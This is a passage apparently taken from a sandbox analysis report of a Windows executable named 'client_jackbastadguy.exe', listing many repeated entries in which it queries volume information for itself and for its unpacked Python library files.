                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\_hashlib.pyd VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\_ssl.pyd VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\base_library.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\pyexpat.pyd VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography-44.0.0.dist-info VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography-44.0.0.dist-info VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography-44.0.0.dist-info VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\cryptography-44.0.0.dist-info VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\_pytransform.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\_pytransform.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\_pytransform.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Util VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Util VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\_cffi_backend.cp310-win_amd64.pyd VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282 VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash VolumeInformation
